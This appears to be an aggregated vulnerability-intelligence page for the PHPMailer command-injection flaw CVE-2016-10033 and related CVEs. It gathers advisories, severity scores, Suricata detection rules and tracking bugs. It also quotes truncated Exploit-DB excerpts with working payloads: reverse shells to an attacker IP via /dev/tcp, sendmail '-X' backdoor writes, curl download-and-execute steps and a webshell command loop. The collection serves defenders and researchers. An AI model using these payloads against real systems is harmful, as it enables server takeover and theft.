CVE-2016-10033
Published 2016-12-30
Priority P197 · critical · 9.8 CVSS 3.1
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability · due 2025-07-28
Exploited in the wild
EPSS: 99.71% (100.0th percentile)
The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | libphp-phpmailer | < libphp-phpmailer 5.2.14+dfsg-2.1 (bookworm) | libphp-phpmailer 5.2.14+dfsg-2.1 (bookworm) |
| debian | libphp-phpmailer | — | — |
| drupal | phpmailer_3rd_party_library | — | — |
| joomla | joomla_! | 1.5.0 – 3.6.5 | — |
| phpmailer | phpmailer | >= 5.0.0 < 5.2.18 | 5.2.18 |
| phpmailer | phpmailer | >= 5.0.0 < 5.2.20 | 5.2.20 |
| phpmailer_project | phpmailer | < 5.2.18 | 5.2.18 |
| phpmailer_project | phpmailer | < 5.2.20 | 5.2.20 |
| wordpress | wordpress | <= 4.7 | — |
Detection & IOCs
- Fortinet IPS signature for CVE-2016-10033 PHPMailer RCE detection
- Fortinet IPS signature PHP.App.Email.Arguments.Parsing.Remote.Code.Execution also covers this vulnerability
- Detect crafted Sender/From email addresses containing backslash-doublequote sequences (e.g. \") used to inject extra sendmail arguments
- Monitor for unexpected new PHP files created in the web root directory following PHPMailer form submissions, as the attack writes a PHP webshell via sendmail log redirection
CVSS provenance
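| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| ghsa | | 9.8 | CRITICAL | |
| osv | | 9.8 | CRITICAL | |
| vulncheck | | 9.8 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |
| vendor_debian | | 9.8 | CRITICAL | |
| vendor_ubuntu | | 9.8 | CRITICAL | |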
OSV
libphp-phpmailer vulnerability
osv·2023-03-15·CVSS 9.8
CVE-2017-11503 [CRITICAL] libphp-phpmailer vulnerability
USN-5956-1 fixed vulnerabilities in PHPMailer. It was discovered that the
fix for CVE-2017-11503 was incomplete. This update fixes the problem.
Original advisory details:
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ubuntu 16.04 ESM and Ubuntu 18.04
ESM. (CVE-2017-11503)
Yo
OSV
libphp-phpmailer vulnerabilities
osv·2023-03-15·CVSS 9.8
CVE-2016-10033 [CRITICAL] libphp-phpmailer vulnerabilities
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ubuntu 16.04 ESM and Ubuntu 18.04
ESM. (CVE-2017-11503)
Yongxiang Li discovered that PHPMailer was not properly converting
relative paths provided as user input when adding attachments to messages,
which could lead to relative im
OSV
Remote code execution in PHPMailer
osv·2020-03-05·CVSS 9.8
CVE-2016-10033 [CRITICAL] Remote code execution in PHPMailer
### Impact
The `mailSend` function in the default `isMail` transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted `Sender` property.
### Patches
Fixed in 5.2.18
### Workarounds
Filter and validate user input before passing it to internal functions.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10033
Related to a follow-on issue in https://nvd.nist.gov/vuln/detail/CVE-2016-10045
### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)
OSV
Remote code execution in PHPMailer
osv·2020-03-05·CVSS 9.8
CVE-2016-10045 [CRITICAL] Remote code execution in PHPMailer
### Impact
The `isMail` transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the `mail` command and consequently execute arbitrary code by leveraging improper interaction between the `escapeshellarg` function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
This issue really emphasises that it's worth avoiding the built-in PHP `mail()` function entirely.
### Patches
Fixed in 5.2.20
### Workarounds
Send via SMTP to localhost instead of calling the `mail()` function.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10045
See also https://nvd.nist.gov/vuln/detail/CVE-2016-10033
### For more information
If you have
GHSA
Remote code execution in PHPMailer
ghsa·2020-03-05·CVSS 9.8
CVE-2016-10033 [CRITICAL] CWE-77 Remote code execution in PHPMailer
### Impact
The `mailSend` function in the default `isMail` transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted `Sender` property.
### Patches
Fixed in 5.2.18
### Workarounds
Filter and validate user input before passing it to internal functions.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10033
Related to a follow-on issue in https://nvd.nist.gov/vuln/detail/CVE-2016-10045
### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)
GHSA
Remote code execution in PHPMailer
ghsa·2020-03-05·CVSS 9.8
CVE-2016-10045 [CRITICAL] CWE-77 Remote code execution in PHPMailer
### Impact
The `isMail` transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the `mail` command and consequently execute arbitrary code by leveraging improper interaction between the `escapeshellarg` function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
This issue really emphasises that it's worth avoiding the built-in PHP `mail()` function entirely.
### Patches
Fixed in 5.2.20
### Workarounds
Send via SMTP to localhost instead of calling the `mail()` function.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10045
See also https://nvd.nist.gov/vuln/detail/CVE-2016-10033
### For more information
If you have
OSV
CVE-2016-10045: The isMail transport in PHPMailer before 5
osv·2016-12-30·CVSS 9.8
CVE-2016-10045 [CRITICAL] CVE-2016-10045: The isMail transport in PHPMailer before 5
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
OSV
CVE-2016-10033: The mailSend function in the isMail transport in PHPMailer before 5
osv·2016-12-30·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033: The mailSend function in the isMail transport in PHPMailer before 5
The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.
VulnCheck
PHPMailer Command Injection Vulnerability
vulncheck·2016·CVSS 9.8
CVE-2016-10033 [CRITICAL] CWE-77 PHPMailer Command Injection Vulnerability
PHPMailer contains a command injection vulnerability because it fails to sanitize user-supplied input. Specifically, this issue affects the 'mail()' function of 'class.phpmailer.php' script. An attacker can exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.
Affected: PHP PHPMailer
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.ic3.gov/Media/News/2022/220126.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cyble.com/resources/
CISA
PHPMailer Command Injection Vulnerability
cisa·2025-07-07·CVSS 9.8
CVE-2016-10033 [CRITICAL] CWE-77 PHPMailer Command Injection Vulnerability
Vulnerability: PHPMailer Command Injection Vulnerability
Affected: PHP PHPMailer
PHPMailer contains a command injection vulnerability because it fails to sanitize user-supplied input. Specifically, this issue affects the 'mail()' function of 'class.phpmailer.php' script. An attacker can exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: This vulnerability could affect an open-source component, third-party library, protocol, or proprietary implementation that could be used by different products. For
Ubuntu
PHPMailer vulnerabilities
vendor_ubuntu·2023-03-15·CVSS 9.8
CVE-2021-3603 [CRITICAL] PHPMailer vulnerabilities
Title: PHPMailer vulnerabilities
Summary: Several security issues were fixed in PHPMailer.
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ubuntu 16.04 ESM and Ubuntu 18.04
ESM. (CVE-2017-11503)
Yongxiang Li discovered that PHPMailer was not properly converting
relative paths provided as user input when addi
Ubuntu
PHPMailer vulnerability
vendor_ubuntu·2023-03-15·CVSS 9.8
CVE-2017-11503 [CRITICAL] PHPMailer vulnerability
Title: PHPMailer vulnerability
Summary: An incomplete fix was discovered in PHPMailer.
USN-5956-1 fixed vulnerabilities in PHPMailer. It was discovered that the
fix for CVE-2017-11503 was incomplete. This update fixes the problem.
Original advisory details:
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ub
Drupal
PHPmailer 3rd party library - PSA-2016-004
vendor_drupal·2016-12-26·CVSS 9.8
CVE-2016-10033 [CRITICAL] PHPmailer 3rd party library - PSA-2016-004
Title: PHPmailer 3rd party library - PSA-2016-004
Vulnerability Type: PHPmailer 3rd party library
Description:
Advisory ID: DRUPAL-SA-PSA-2016-004
Project: PHPMailer (third-party library)
Version: 7.x, 8.x
Date: 2016-December-26
Security risk: 23/25 (Highly Critical) AC:None/A:User/CI:All/II:All/E:Exploit/TD:All
Vulnerability: Arbitrary PHP code execution
Description: The PHPMailer and SMTP modules (and maybe others) add support for sending e-mails using the 3rd party PHPMailer library. In general the Drupal project does not create advisories for 3rd party libraries. Drupal site maintainers should pay attention to the notifications provided by those 3rd party libraries as outlined in PSA-2011-002 - External libraries and plugins. However, given the extreme criticality of this issue and
Debian
CVE-2016-10045: libphp-phpmailer - The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to ...
vendor_debian·2016·CVSS 9.8
CVE-2016-10045 [CRITICAL] CVE-2016-10045: libphp-phpmailer - The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to ...
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
Debian
CVE-2016-10033: libphp-phpmailer - The mailSend function in the isMail transport in PHPMailer before 5.2.18 might a...
vendor_debian·2016·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033: libphp-phpmailer - The mailSend function in the isMail transport in PHPMailer before 5.2.18 might a...
The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.
Scope: local
bookworm: resolved (fixed in 5.2.14+dfsg-2.1)
bullseye: resolved (fixed in 5.2.14+dfsg-2.1)
forky: resolved (fixed in 5.2.14+dfsg-2.1)
sid: resolved (fixed in 5.2.14+dfsg-2.1)
trixie: resolved (fixed in 5.2.14+dfsg-2.1)
Suricata
ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M3
suricata·2017-05-05·CVSS 9.8
CVE-2016-10033 [CRITICAL] ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M3
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M3"; flow:established,to_server; http.header; content:"substr{"; nocase; fast_pattern; http.host; pcre:"/^[^\r\n]+?[\x28\x29\x27\x22\x7b\x7d]/"; reference:url,exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html; classtype:web-application-attack; sid:2024279; rev:5; metadata:affected_product Wordpress, attack_target Web_Server, created_at 2017_05_05, cve CVE_2016_10033, deployment Perimeter, signature_severity Major, updated_at 2024_03_25;)
Suricata
ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M2
suricata·2017-05-05·CVSS 9.8
CVE-2016-10033 [CRITICAL] ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M2
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M2"; flow:established,to_server; http.uri; content:"action=lostpassword"; nocase; fast_pattern; http.host; pcre:"/^[^\r\n]+?[\x28\x29\x27\x22\x7b\x7d]/"; reference:url,exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html; classtype:web-application-attack; sid:2024278; rev:5; metadata:affected_product Wordpress, attack_target Web_Server, created_at 2017_05_05, cve CVE_2016_10033, deployment Perimeter, signature_severity Major, updated_at 2024_03_25;)
Suricata
ET EXPLOIT Possible CVE-2016-10033 PHPMailer RCE Attempt
suricata·2016-12-27·CVSS 9.8
CVE-2016-10033 [CRITICAL] ET EXPLOIT Possible CVE-2016-10033 PHPMailer RCE Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2016-10033 PHPMailer RCE Attempt"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"<?php"; fast_pattern; content:"|5c 22 20|"; content:"-X"; content:".php"; content:"@"; http.content_type; content:"multipart/form-data|3b|"; startswith; reference:url,legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html; reference:url,github.com/opsxcq/exploit-CVE-2016-10033; classtype:attempted-user; sid:2023686; rev:4; metadata:affected_product PHPMailer, attack_target Web_Server, created_at 2016_12_27, cve CVE_2016_10033, deployment Datacenter, performance_impact Low, confidence Medium, signat
Exploit-DB
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
exploitdb·2017-06-21·CVSS 9.8
CVE-2016-10074 [CRITICAL] PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
PHPMailer 2):
print "No such target. Exiting\n"
exit(3)
################################
# Payload
################################
cmd = "/bin/bash -c '0/dev/tcp/%s/%s;nohup sh &196 2>&196 &'" % (args.ATTACKER_IP, args.ATTACKER_PORT)
prepared_cmd = prepare_cmd(cmd)
payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'
# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)
if target == 2:
payload = "\"a\\' -be " + prepared_cmd + " \"@a.co"
################################
# Attack episode
# This step will execute the reverse shell
################################
# Form fields
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: 'Really important message'}
# Print relevant information
print "\n[
Exploit-DB
WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)
exploitdb·2017-05-17·CVSS 9.8
CVE-2016-10033 [CRITICAL] WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'WordPress PHPMailer Host Header Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in WordPress
version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer,
a mail-sending library that is bundled with WordPress.
A valid WordPress username is required to exploit the vulnerability.
Additionally, due to the altered Host header, exploitation is limited to
the default virtual host, assuming the header isn't mangled in transit.
If the target is running Apache 2.2.32 or 2.4.24 and later, the server
m
Exploit-DB
Vanilla Forums < 2.3 - Remote Code Execution
exploitdb·2017-05-11·CVSS 9.8
CVE-2016-10073 [CRITICAL] Vanilla Forums < 2.3 - Remote Code Execution
Vanilla Forums /dev/tcp/$rev_host/1337 0&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# POST data string
data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON'
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK"
if [ $? -ne 0 ]; then
echo "[!] Failed conecting to the target URL. Exiting"
exit 2
fi
echo -e "\e[92m[+]\033[0m Connected to the target"
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
sleep 2s
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/usr/bin/nohup /bin/bash /tmp/rce"
p
Exploit-DB
WordPress Core 4.6 - Remote Code Execution
exploitdb·2017-05-03·CVSS 9.8
CVE-2016-10033 [CRITICAL] WordPress Core 4.6 - Remote Code Execution
---
#!/bin/bash
#
# __ __ __ __ __
# / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
# / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,/dev/tcp/$rev_host/1337 0&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_h
Exploit-DB
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
exploitdb·2017-01-02·CVSS 9.8
CVE-2016-10074 [CRITICAL] PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
PHPMailer 4):
print "No such target. Exiting\n"
exit(3)
if target == 1:
# PHPMailer "
RCE_PHP_CODE = """/dev/tcp/%s/%s 0&1' "); ?>""" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT)
# The form names might need to be adjusted
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: RCE_PHP_CODE}
# Attack
# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor
print "[+] Backdoor upload via the contact form at '%s'\n" % CONTACT_SCRIPT_URL
data = urllib.urlencode(post_fields)
req = urllib2.Request(CONTACT_SCRIPT_URL, data)
response = urllib2.urlopen(req)
the_page = response.read()
# Check if the backdoor was uploaded correctly.
# A little trick here. The urlopen s
Exploit-DB
PHPMailer < 5.2.18 - Remote Code Execution
exploitdb·2016-12-29·CVSS 9.8
CVE-2016-10033 [CRITICAL] PHPMailer < 5.2.18 - Remote Code Execution
PHPMailer
3 - Open other terminal and run the exploit: python3 anarcoder.py
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
os.system('clear')
print("\n")
pri
Exploit-DB
PHPMailer < 5.2.20 - Remote Code Execution
exploitdb·2016-12-27·CVSS 9.8
CVE-2016-10045 [CRITICAL] PHPMailer < 5.2.20 - Remote Code Execution
PHPMailer "
post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
Exploit-DB
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)
exploitdb·2016-12-26·CVSS 9.8
CVE-2016-1004 [CRITICAL] PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)
PHPMailer 'PHPMailer Sendmail Argument Injection',
'Description' => %q{
PHPMailer versions up to and including 5.2.19 are affected by a
vulnerability which can be leveraged by an attacker to write a file with
partially controlled contents to an arbitrary location through injection
of arguments that are passed to the sendmail binary. This module
writes a payload to the web root of the webserver before then executing
it with an HTTP request. The user running PHPMailer must have write
access to the specified WEB_ROOT directory and successful exploitation
can take a few minutes.
},
'Author' => [
'Dawid Golunski', # vulnerability discovery and original PoC
'Spencer McIntyre' # metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2016-10033'],
['CVE', '2016-10045'],
['EDB',
Exploit-DB
PHPMailer < 5.2.18 - Remote Code Execution
exploitdb·2016-12-26·CVSS 9.8
CVE-2016-10033 [CRITICAL] PHPMailer < 5.2.18 - Remote Code Execution
PHPMailer \r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'
cmd='whoami'
while [ "$cmd" != 'exit' ]
do
echo '[+] Running '$cmd
curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
echo
read -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'
Exploit-DB
PHPMailer < 5.2.18 - Remote Code Execution
exploitdb·2016-12-25·CVSS 9.8
CVE-2016-10033 [CRITICAL] PHPMailer < 5.2.18 - Remote Code Execution
PHPMailer
09607 ";
// ------------------
// mail() param injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()"
$mail->SetFrom($email_from, 'Client Name');
$address = "[email protected]";
$mail->AddAddress($address, "Some User");
$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);
if(!$mail->Send()) {
echo "Mailer Error: " . $mail->ErrorInfo;
} else {
echo "Message sent!\n";
}
?>
Nuclei
WordPress PHPMailer < 5.2.18 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2016-10033 [CRITICAL] WordPress PHPMailer < 5.2.18 - Remote Code Execution
WordPress PHPMailer ([A-Za-z0-9]+)'
internal: true
part: body
# digest: 490a00463044022008b31c07add92ccfdd42714769c7777a3905388c545558ee34daf90307912cfa02207ff6779e8c5b71723749541f3dbf606f6b6d64b79b2253dd4a8682e509e4550f:922c64590222798bb761d5b6d8e72950
Metasploit
WordPress PHPMailer Host Header Command Injection
metasploit
This module exploits a command injection vulnerability in WordPress version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer, a mail-sending library that is bundled with WordPress. A valid WordPress username is required to exploit the vulnerability. Additionally, due to the altered Host header, exploitation is limited to the default virtual host, assuming the header isn't mangled in transit. If the target is running Apache 2.2.32 or 2.4.24 and later, the server may have HttpProtocolOptions set to Strict, preventing a Host header containing parens from passing through, making exploitation unlikely.
Metasploit
PHPMailer Sendmail Argument Injection
metasploit
PHPMailer versions up to and including 5.2.19 are affected by a vulnerability which can be leveraged by an attacker to write a file with partially controlled contents to an arbitrary location through injection of arguments that are passed to the sendmail binary. This module writes a payload to the web root of the webserver before then executing it with an HTTP request. The user running PHPMailer must have write access to the specified WEB_ROOT directory and successful exploitation can take a few minutes.
HackerOne
RCE by command line argument injection to `gm convert` in `/edit/process?a=crop`
hackerone·2017-04-26·CVSS 9.8
[CRITICAL] RCE by command line argument injection to `gm convert` in `/edit/process?a=crop`
### Summary
The `y` parameter of `/edit/process` endpoint (with `a=crop`) is vulnerable to command-line argument injection to something that appears to be GraphicsMagick utility (probably `gm convert`). Due to GraphicsMagick's hacker-friendly processing of `|`-starting filenames supplied to `-write` option, it leads to command execution.
### Reproduction steps
0. Enable Burp Proxy or similar software that allows you to log and edit HTTP requests.
1. Login into your imgur account and upload an image.
2. Move your mouse over the image, click on the tiny button with pencil on it, then click "Edit".
3. Select a random rectangle on the image, then click "Apply".
4. In the burp suite, you will see a request to a
Bugzilla
CVE-2016-10045 phpmailer: Parameter injection via mail() function
bugzilla·2017-01-11·CVSS 9.8
CVE-2016-10045 [CRITICAL] CVE-2016-10045 phpmailer: Parameter injection via mail() function
The isMail transport in PHPMailer before 5.2.20, when the Sender property is not set, might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
References:
http://seclists.org/oss-sec/2016/q4/771
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
Bugzilla
CVE-2016-10033 mantis: phpmailer: Parameter injection via mail() function [epel-5]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 mantis: phpmailer: Parameter injection via mail() function [epel-5]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
[bug automatically created by: add-tracking-bu
Bugzilla
CVE-2016-10033 phpmailer: Parameter injection via mail() function
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 phpmailer: Parameter injection via mail() function
A vulnerability was found in PHPMailer. This code is being used in multiple web applications. A remote code execution could be achieved by passing a maliciously crafted expression to the vulnerable application.
References:
http://seclists.org/oss-sec/2016/q4/750
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Discussion:
Created drupal7 tracking bugs for this issue:
Affects: fedora-all [bug 1409494]
Affects: fedora-all [bug 1409495]
Affects: epel-all [bug 1409496]
---
Created wordpress tracking bugs for this issue:
Affects: fedora-all [bug 1409497]
Affects: epel-all [bug 1409498]
---
Created mantis tracking bugs for this issue:
Affects: fedora-all [bug 1409492]
Affe
Bugzilla
CVE-2016-10033 wordpress: phpmailer: Parameter injection via mail() function [epel-all]
bugzilla·2017-01-02·CVSS 9.8
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple support
Bugzilla
CVE-2016-10033 drupal7: phpmailer: Parameter injection via mail() function [epel-all]
bugzilla·2017-01-02·CVSS 9.8
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported
Bugzilla
CVE-2016-10033 php-PHPMailer: phpmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
